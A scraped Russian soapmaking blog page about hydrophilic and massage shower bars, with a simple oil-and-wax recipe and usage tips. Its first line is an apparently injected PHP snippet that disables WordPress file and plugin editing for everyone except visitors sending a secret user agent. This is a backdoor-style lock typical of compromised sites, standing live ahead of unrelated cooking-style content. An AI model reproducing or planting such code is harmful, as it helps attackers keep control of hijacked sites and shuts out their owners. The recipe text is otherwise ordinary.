if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Гидрофильные и массажные плитки для душа | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Гидрофильные и массажные плитки для душа

Гидрофильные плиточки представляют собой твердый крем для тела. В их состав, помимо твердых и жидких масел, входит эмульсионный воск, который и отличает гидрофильные плитки от массажных

Домашняя косметика - плитки для душа Домашняя косметика - плитки для душа

Гид­ро­филь­ные пли­точ­ки пред­став­ля­ют собой твер­дый крем для тела. В их состав, поми­мо твер­дых и жид­ких масел,  вхо­дит эмуль­си­он­ный воск, кото­рый и отли­ча­ет гид­ро­филь­ные плит­ки от массажных.

Кро­ме того, после исполь­зо­ва­ния мас­саж­ных пли­ток на теле оста­ет­ся мас­ля­ный след, что не быва­ет при при­ме­не­нии гидрофильных.

Рецепт мас­саж­ной плитки

При­го­то­вить мас­ля­ные пли­точ­ки дома доволь­но про­сто. Берем 50% твер­дых масел (какао и ши поров­ну), пче­ли­ный воск 10%, мас­ло вино­град­ных косто­чек и жожо­ба 25%, эфир­ное мас­ло на выбор 2%. Твер­дые состав­ля­ю­щие топим на водя­ной бане, добав­ля­ем жид­кие ингри­ди­ен­ты и зали­ва­ем в фор­му. Полу­чит­ся мас­саж­ная пли­точ­ка молоч­но­го или кре­мо­во­го оттен­ка. По жела­нию мож­но доба­вить мик­ку или кра­си­тель. Хра­нить жела­тель­но в холодильнике.

Для изго­тов­ле­ния гид­ро­филь­ной плит­ки к полу­чен­ной сме­си добав­ля­ем эмуль­си­он­ный воск 13%.

Поль­зо­вать­ся таки­ми пли­точ­ка­ми надо непо­сред­ствен­но в душе, рас­ти­рая их на влаж­ное разо­гре­тое тело. Минут через 5 мас­ля­ные остат­ки нуж­но смыть водой, кожу слег­ка про­мок­нуть поло­тен­цем и дать ей досох­нуть самой. После исполь­зо­ва­ния гид­ро­филь­ных пли­ток уже не надо поль­зо­вать­ся кре­ма­ми и лосьо­на­ми для тела, кожа ста­но­вит­ся очень мяг­кой, неж­ной, глад­кой. Поль­зу­ясь посто­ян­но мас­ля­ны­ми или гид­ро­филь­ны­ми плит­ка­ми, мож­но зна­чи­тель­но улуч­шить состо­я­ние кожи тела и навсе­гда забыть, что такое сухость и раз­дра­же­ние кожи.

Рецеп­ты при­го­тов­ле­ния гид­ро­филь­ных и мас­саж­ных пли­ток для душа смот­ри­те в соот­вет­ству­ю­щем разделе.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!